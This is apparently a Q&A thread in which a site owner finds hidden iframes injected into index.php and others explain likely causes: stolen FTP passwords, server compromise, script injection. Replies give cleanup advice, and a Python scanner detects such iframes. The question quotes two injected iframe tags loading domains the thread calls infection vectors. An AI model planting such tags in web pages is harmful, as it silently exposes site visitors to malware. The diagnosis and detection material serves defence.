Mysterious html inserted into my site's pages (hacked?)

Twice, I've found weird code at the top of my index.php.

The first time, it was this:

<iframe src="http://ntwportal.com/" width="2" height="4"></iframe>

Then this:

<iframe src="http://gtwdnsglobe.org/" width="2" height="4"></iframe>

How is this happening? Do I have a security flaw?

No one who has FTP access (that I know of) would do this. I recently deployed a new site, and this is still happening.


Probably a virus.

http://www.google.com/safebrowsing/diagnostic?site=http://ntwportal.com/&hl=en

Is the HTML also on your local computer? You might have a virus that inserted it. Otherwise, check the host's security; it might have been broken into.


Yes, you're hacked, by the usual Russian-sphere adult-webmaster suspects. Those sites are down at the moment but they are known infection vectors.

Is the iframe code in the .php file itself when you re-download it from the server, or is it only in its output?

In the former case, either the server itself is compromised (is it your server or a third party's?), or you've been lax in setting the permissions so that the webserver user can write to the files, or — more likely in this case I think — you or one of the other people with FTP access to your account has had their password stolen by a trojan they will have picked up by a similar infection on another site.

In the latter case, it could come from the database if you have an application-level compromise in your PHP scripts (SQL and script injection, which are extremely common in badly-written PHP), or, if there's no sign in the source or the database, it could again be a server-level compromise.

Nuke the site, ensure your own machine is clean(*), change passwords, and stop using FTP. There is no reason not to migrate to SFTP in this century.

(*: don't assume your machine is clean just because you have one anti-virus that says so. Today's anti-virus is almost useless at detecting and especially cleaning malware. If you've been hit by a sploit in the past, you're very probably still infected with something the AV didn't catch.)


If you're accepting any type of input on your pages, make sure that it is being escaped properly. Sounds like a case of script injection. If you're looking for more information, a search for SQL injection, script injection, or cross-site scripting should yield some results.


This is a well-known, widespread FTP spyware/bot/hack/thing. You or someone else that has the password to your FTP server has spyware on their computer that logged the password, and sent it to some evil people. Those evil people then ran a bot that connected to your FTP server, and appended an <iframe> at the bottom of every HTML/PHP-page. What you should do is get rid of the spyware, and then change the password to your FTP server.
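One way to check whether the iframe is in the files on the server rather than only in the output, and how many pages were touched (an added example, not code from any poster in this thread): it walks a freshly downloaded copy of the web root and reports near-invisible iframes that load a remote URL. The 5-pixel threshold, the extension list, the function names and the `.example` hostnames are assumptions made for the illustration.

```python
import re
import tempfile
from pathlib import Path

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)  # opening tag only
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*["']?([^"'\s>]+)""")  # quoted or bare values
MAX_DIM = 5  # assumption: frames this small (pixels) are meant to be invisible
EXTENSIONS = {".php", ".html", ".htm"}


def suspicious_iframes(text):
    """Return the src of every near-invisible iframe that loads a remote URL."""
    hits = []
    for match in IFRAME_RE.finditer(text):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(match.group(1))}
        src = attrs.get("src", "")
        dims = [attrs.get("width", ""), attrs.get("height", "")]
        tiny = any(d.isdigit() and int(d) <= MAX_DIM for d in dims)
        if tiny and re.match(r"(https?:)?//", src, re.IGNORECASE):
            hits.append(src)
    return hits


def scan_tree(root):
    """Map each .php/.html file under root to the suspicious iframe URLs in it."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in EXTENSIONS:
            found = suspicious_iframes(path.read_text(errors="replace"))
            if found:
                report[path.relative_to(root).as_posix()] = found
    return report


def demo():
    """Build a constructed two-file web root and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        # Constructed sample: injected frame at the top, placeholder host.
        (root / "index.php").write_text(
            '<iframe src="http://injected.example/" width="2" height="4"></iframe>\n<?php echo 1; ?>\n')
        # Constructed sample: ordinary visible embed, must not be flagged.
        (root / "about.html").write_text(
            '<iframe src="https://maps.example/embed" width="600" height="400"></iframe>\n')
        return scan_tree(root)


if __name__ == "__main__":
    print(demo())
```

A clean result from `scan_tree()` on the downloaded files while the iframe still shows up in the served page points toward the database or the server itself, as the answer above distinguishes.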


When I type "http://ntwportal.com/" in Google, avast stops me from seeing the search results with a virus warning. It's possible that somehow your FTP has been compromised. You should reinstall everything and change all your passwords.